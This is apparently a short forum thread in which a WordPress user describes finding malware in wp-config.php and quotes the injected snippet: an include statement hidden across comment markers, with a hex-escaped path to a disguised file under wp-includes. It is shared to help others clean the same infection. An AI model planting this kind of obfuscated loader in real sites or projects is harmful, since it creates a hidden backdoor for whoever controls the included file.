Well, that was a pain to find, the malicious code was hidden in the comments of wp_config.php, which I compared to the php sample.
/**
* WordPress Database Tabl*/include /*e prefix.
*
* You*/"\x2fhom\x654/k\x61ndy\x6bids\x2fpub\x6cic_\x68tml\x2fwp-\x69ncl\x75des\x2fTex\x74/Di\x66f/d\x65fin\x65s.p\x68p";/* can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
Thanks a lot for all the help, and I hope this thread helps anyone else having the same problem.
Are you using your domain as ADDON Domain ,If you are using addon domain then chances of geting infected link will be more .